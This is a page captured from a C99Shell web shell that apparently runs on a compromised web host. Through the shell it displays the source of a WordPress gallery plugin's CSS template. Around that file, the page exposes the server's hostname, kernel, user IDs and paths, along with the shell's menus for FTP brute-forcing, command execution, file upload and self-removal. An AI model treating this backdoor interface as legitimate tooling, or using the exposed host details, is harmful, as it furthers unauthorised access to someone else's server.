!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/gallery-images/templates/front-end/view/thumbnails/   drwxr-xr-x
Free 181.15 GB of 490.84 GB (36.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     thumbnails-view.css.php (15.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<style>
section #huge_it_gallery<?php echo $galleryID?> {
    padding: <?php echo $gallery_default_params['gallery_img_thumb_box_padding']; ?>px !important;
    min-width: 100%;
    width: 100%;
    min-height: 100%;
    text-align: center;
    margin: 0;
    margin-bottom: 30px;
<?php if($gallery_default_params["gallery_img_thumb_box_has_background"] == 'on'){ ?>  background-color: #<?php echo $gallery_default_params["gallery_img_thumb_box_background"]; ?><?php ?>
<?php 
if($gallery_default_params["gallery_img_thumb_box_use_shadow"] == 'on'){ echo 'box-shadow: 0 0 10px;'; } ?>
}
#huge_it_gallery<?php echo $galleryID?> .huge_it_big_li {
<?php if($gallery_default_params["gallery_img_image_natural_size_thumbnail"] == 'resize'){?>
    overflow:hidden;
    width: 100%;
    max-width: <?php echo $gallery_default_params["gallery_img_thumb_image_width"]+2*$gallery_default_params["gallery_img_thumb_image_border_width"]; ?>px;
    height: <?php echo $gallery_default_params["gallery_img_thumb_image_height"]+2*$gallery_default_params["gallery_img_thumb_image_border_width"]; ?>px;
    margin: <?php echo $gallery_default_params["gallery_img_thumb_margin_image"]; ?>px <?php echo $gallery_default_params["gallery_img_thumb_margin_image"]-2?>px !important;
    border-radius: <?php echo $gallery_default_params["gallery_img_thumb_image_border_radius"]; ?>px;
    padding:0 !important;
<?php }
elseif(
$gallery_default_params["gallery_img_image_natural_size_thumbnail"] == 'natural'){
?>
    overflow:hidden;
    width: <?php echo $gallery_default_params["gallery_img_thumb_image_width"]+2*$gallery_default_params["gallery_img_thumb_image_border_width"]; ?>px;
    height: <?php echo $gallery_default_params["gallery_img_thumb_image_height"]+2*$gallery_default_params["gallery_img_thumb_image_border_width"]; ?>px;
    margin: <?php echo $gallery_default_params["gallery_img_thumb_margin_image"]; ?>px !important;
    border-radius: <?php echo $gallery_default_params["gallery_img_thumb_image_border_radius"]; ?>px;
    padding:0 !important;
<?php }?>
    border-radius: <?php echo $gallery_default_params["gallery_img_thumb_image_border_radius"]; ?>px;
    border: <?php echo $gallery_default_params["gallery_img_thumb_image_border_width"]; ?>px solid #<?php echo $gallery_default_params["gallery_img_thumb_image_border_color"]; ?>;
    box-sizing: border-box;
    position: relative;
    display: inline-block;
}
#huge_it_gallery<?php echo $galleryID?> li img {
<?php if($gallery_default_params["gallery_img_image_natural_size_thumbnail"] == 'resize'){?>
    width: 100%;
    max-width: <?php echo $gallery_default_params["gallery_img_thumb_image_width"]; ?>px;
    height: <?php echo $gallery_default_params["gallery_img_thumb_image_height"]; ?>px;
    margin:0 !important;
<?php }
elseif(
$gallery_default_params["gallery_img_image_natural_size_thumbnail"] == 'natural'){
?>
    margin:0 !important;
    max-width: none !important;
<?php }?>
    border-radius: <?php  if($gallery_default_params["gallery_img_thumb_image_border_width"] == 0) echo $gallery_default_params["gallery_img_thumb_image_border_radius"]; else echo 0?>px;
}
section #huge_it_gallery<?php echo $galleryID?> li .overLayer ul li h2,
section #huge_it_gallery<?php echo $galleryID?> li .infoLayer ul li h2 {
    font-size: <?php echo $gallery_default_params["gallery_img_thumb_title_font_size"]; ?>px;
    color: #<?php echo $gallery_default_params["gallery_img_thumb_title_font_color"]; ?>;
}
section #huge_it_gallery<?php echo $galleryID?> li .infoLayer ul li p {
    color: #<?php echo $gallery_default_params["gallery_img_thumb_title_font_color"]; ?>;
}
section #huge_it_gallery<?php echo $galleryID?> li .overLayer,
section #huge_it_gallery<?php echo $galleryID?> li .infoLayer {
    -webkit-transition: opacity 0.3s linear;
    -moz-transition: opacity 0.3s linear;
    -ms-transition: opacity 0.3s linear;
    -o-transition: opacity 0.3s linear;
    transition: opacity 0.3s linear;
    width: 100%;
    max-width: <?php echo $gallery_default_params["gallery_img_thumb_image_width"]+2*$gallery_default_params["gallery_img_thumb_image_border_width"]; ?>px;
    height: <?php echo $gallery_default_params["gallery_img_thumb_image_height"]+2*$gallery_default_params["gallery_img_thumb_image_border_width"]; ?>px;
    position: absolute;
    text-align: center;
    opacity: 0;
    top: 0;
    left: 0;
    z-index: 4;
    max-height: 100%;
    border-radius: <?php  if($gallery_default_params["gallery_img_thumb_image_border_width"] == 0) echo $gallery_default_params["gallery_img_thumb_image_border_radius"]; else echo 0?>px;
}
section #huge_it_gallery<?php echo $galleryID?> li a {
    position: absolute;
    display: block;
    width: 100%;
    max-width: <?php echo $gallery_default_params["gallery_img_thumb_image_width"]+2*$gallery_default_params["gallery_img_thumb_image_border_width"]; ?>px;
    height: <?php echo $gallery_default_params["gallery_img_thumb_image_height"]+2*$gallery_default_params["gallery_img_thumb_image_border_width"]; ?>px;
    top: 0;
    left: 0;
    z-index: 6;
    max-height: 100%;
}
li#fullPreview{
    list-style: none;
}
.load_more3 {
    margin: 10px 0;
    position:relative;
    text-align:<?php if($gallery_default_params['gallery_img_video_ht_view7_loadmore_position'] == 'left') {echo 'left';}
                    elseif (
$gallery_default_params['gallery_img_video_ht_view7_loadmore_position'] == 'center') { echo 'center'; }
                    elseif(
$gallery_default_params['gallery_img_video_ht_view7_loadmore_position'] == 'right') { echo 'right'; }?>;
    width:100%;
}
.load_more_button3 {
    border-radius: 10px;
    display:inline-block;
    padding:5px 15px;
    font-size:<?php echo $gallery_default_params['gallery_img_video_ht_view7_loadmore_fontsize']; ?>px !important;;
    color:<?php echo '#'.$gallery_default_params['gallery_img_video_ht_view7_loadmore_font_color']; ?> !important;;
    background:<?php echo '#'.$gallery_default_params['gallery_img_video_ht_view7_button_color']; ?> !important;
    cursor:pointer;
}
.load_more_button3:hover{
    color:<?php echo '#'.$gallery_default_params['gallery_img_video_ht_view7_loadmore_font_color_hover']; ?> !important;
    background:<?php echo '#'.$gallery_default_params['gallery_img_video_ht_view7_button_color_hover']; ?> !important;
}
.loading3 {
    display:none;
}
.paginate3{
    font-size:<?php echo $gallery_default_params['gallery_img_video_ht_view7_paginator_fontsize']; ?>px !important;
    color:<?php echo '#'.$gallery_default_params['gallery_img_video_ht_view7_paginator_color']; ?> !important;
    text-align: <?php echo $gallery_default_params['gallery_img_video_ht_view7_paginator_position']; ?>;
}
.paginate3 a{
    border-bottom: none !important;
}
.icon-style3{
    font-size: <?php echo $gallery_default_params['gallery_img_video_ht_view7_paginator_icon_size']; ?>px !important;
    color:<?php echo '#'.$gallery_default_params['gallery_img_video_ht_view7_paginator_icon_color']; ?> !important;
}
.clear{
    clear:both;
}
section #huge_it_gallery<?php echo $galleryID?> li:hover .overLayer {
    -webkit-transition: opacity 0.3s linear;
    -moz-transition: opacity 0.3s linear;
    -ms-transition: opacity 0.3s linear;
    -o-transition: opacity 0.3s linear;
    transition: opacity 0.3s linear;
    opacity: <?php echo ($gallery_default_params["gallery_img_thumb_title_background_transparency"]/100)+0.001?>;
    display: block;
    background: #<?php echo $gallery_default_params["gallery_img_thumb_title_background_color"]; ?>;
}
section #huge_it_gallery<?php echo $galleryID?> li:hover .infoLayer {
    -webkit-transition: opacity 0.3s linear;
    -moz-transition: opacity 0.3s linear;
    -ms-transition: opacity 0.3s linear;
    -o-transition: opacity 0.3s linear;
    transition: opacity 0.3s linear;
    opacity: 1;
    display: block;
}
section #huge_it_gallery<?php echo $galleryID?> p {text-align:center;}
<?php    switch ($like_dislike) {
case 
"dislike":
    
?>
/*/////Like/Dislike Styles BEGIN//////like/dislike//////*/
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?>{
    position: absolute;
    top: 80%;
    right: 10px;
    z-index: 999;
    display: none;
    color: #<?php echo $gallery_default_params['gallery_img_ht_thumb_likedislike_font_color']; ?>;
}
#huge_it_gallery<?php echo $galleryID?> .huge_it_big_li:hover .huge_it_gallery_like_cont_<?php echo $galleryID.$pID?>{
    display: table;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_like_wrapper ,
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_dislike_wrapper {
    position:relative;
    background:<?php
            
list($r,$g,$b) = array_map('hexdec',str_split($gallery_default_params['gallery_img_ht_thumb_likedislike_bg'],2));
                
$titleopacity=$gallery_default_params["gallery_img_ht_thumb_likedislike_bg_trans"]/100;
                echo 
'rgba('.$r.','.$g.','.$b.','.$titleopacity.')  !important';         
    
?>;
    display: inline-block;
    border-radius: 3px;
    font-size:0;
    cursor: pointer;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_like_wrapper{
    margin-right: 30px !important;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_dislike_wrapper{
    margin: 3px 3px 3px 0;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_like{
    font-size:0;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_like .huge_it_like_thumb {
    display:block;
    float:left;
    padding:4px 4px 4px 18px;
    font-size: 12px;
    font-weight: 700;
    position:relative;
    height: 28px;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_like_count,
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_dislike_count{
    display:block;
    float:left;
    padding:4px 4px 4px 4px;
    font-size: 12px;
    font-weight: 700;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_dislike{
    font-size:0;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_dislike .huge_it_dislike_thumb {
    display:block;
    float:left;
    padding:4px 4px 4px 18px;
    font-size: 12px;
    font-weight: 700;
    position:relative;
    height: 28px;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .like_thumb_up{
    font-size: 17px;
    position:absolute;
    top: 0;
    left: -20px;
    color:#<?php echo $gallery_default_params['gallery_img_ht_thumb_likedislike_thumb_color']; ?>;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .dislike_thumb_down{
    font-size: 17px;
    position:absolute;
    top: 0;
    left: -20px;
    color:#<?php echo $gallery_default_params['gallery_img_ht_thumb_likedislike_thumb_color']; ?>;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_hide{
    display: none !important;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .like_thumb_active{
    color: #<?php echo $gallery_default_params['gallery_img_ht_thumb_likedislike_thumb_active_color']; ?> !important;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .like_font_active{
    color: #<?php echo $gallery_default_params['gallery_img_ht_thumb_active_font_color']; ?> !important;
}
@media screen and (min-width: 768px){
    .huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_like_wrapper:hover .huge_it_like {
        color: #<?php echo $gallery_default_params['gallery_img_ht_thumb_active_font_color']; ?> !important;
    }
    .huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_like_wrapper:hover .like_thumb_up {
        color: #<?php echo $gallery_default_params['gallery_img_ht_thumb_likedislike_thumb_active_color']; ?> !important;
    }
    .huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_dislike_wrapper:hover .huge_it_dislike {
        color: #<?php echo $gallery_default_params['gallery_img_ht_thumb_active_font_color']; ?> !important;
    }
    .huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_dislike_wrapper:hover .dislike_thumb_down {
        color: #<?php echo $gallery_default_params['gallery_img_ht_thumb_likedislike_thumb_active_color']; ?> !important;
    }
}
/*/////Like/Dislike Styles END//////like/dislike//////*/
<?php break;
      case 
'heart':
?>
/*/////Like/Dislike Styles BEGIN//////Heart//////*/
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?>{
    position: absolute;
    top: 0;
    right: 0;
    z-index: 99;
    display: none;
}
#huge_it_gallery<?php echo $galleryID?> .huge_it_big_li:hover .huge_it_gallery_like_cont_<?php echo $galleryID.$pID?>{
    display: block;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_like_wrapper  {
    position:relative;
    background:<?php
            
list($r,$g,$b) = array_map('hexdec',str_split($gallery_default_params['gallery_img_ht_thumb_likedislike_bg'],2));
                
$titleopacity=$gallery_default_params["gallery_img_ht_thumb_likedislike_bg_trans"]/100;
                echo 
'rgba('.$r.','.$g.','.$b.','.$titleopacity.')  !important';         
    
?>;
    display: inline-block;
    border-radius: 8px;
    font-size:0;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_like_wrapper:hover{
    background: #D6D4D4;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_like_wrapper{
    margin: 3px;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_like{
    font-size:0;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_like .huge_it_like_thumb {
    display: block;
    float: left;
<?php $heartCount='';
if(
$gallery_default_params['gallery_img_ht_thumb_rating_count'] == 'off'){
    
$heartCount="transparent";
}else{
    
$heartCount='#'.$gallery_default_params['gallery_img_ht_thumb_likedislike_font_color'];
}
?>;
    color:<?php echo $heartCount?>;
    width: 38px;
    height: 38px;
    padding:8px 0 !important;
    font-size: 12px;
    text-align: center;
    font-weight: 700;
    position: relative;
    cursor: pointer;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_like_count{
    display:none;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_like  .likeheart{
    font-size: 32px;
    color:#<?php echo $gallery_default_params['gallery_img_ht_thumb_heart_likedislike_thumb_color']; ?>;
    position: absolute;
    top: 4px;
    left: 3px;
    transition:0.3s ease;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .like_thumb_active{
    color: #<?php echo $gallery_default_params['gallery_img_ht_thumb_heart_likedislike_thumb_active_color']; ?> !important;
}
.huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .like_font_active{
<?php if($gallery_default_params['gallery_img_ht_thumb_rating_count'] != 'off'):?>
    color: #<?php echo $gallery_default_params['gallery_img_ht_thumb_active_font_color']; ?> !important;
<?php endif; ?>
}
@media screen and (min-width: 768px){
    .huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_like_wrapper:hover .huge_it_like_thumb {
    <?php if($gallery_default_params['gallery_img_ht_thumb_rating_count'] != 'off'):?>
        color: #<?php echo $gallery_default_params['gallery_img_ht_thumb_active_font_color']; ?> !important;
    <?php endif; ?>
    }
    .huge_it_gallery_like_cont_<?php echo $galleryID.$pID?> .huge_it_gallery_like_wrapper:hover .likeheart {
        color: #<?php echo $gallery_default_params['gallery_img_ht_thumb_heart_likedislike_thumb_active_color']; ?> !important;
    }
}
/*/////Like/Dislike Styles END//////Heart//////*/
<?php
          
break;
          }
?>
</style>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0138 ]--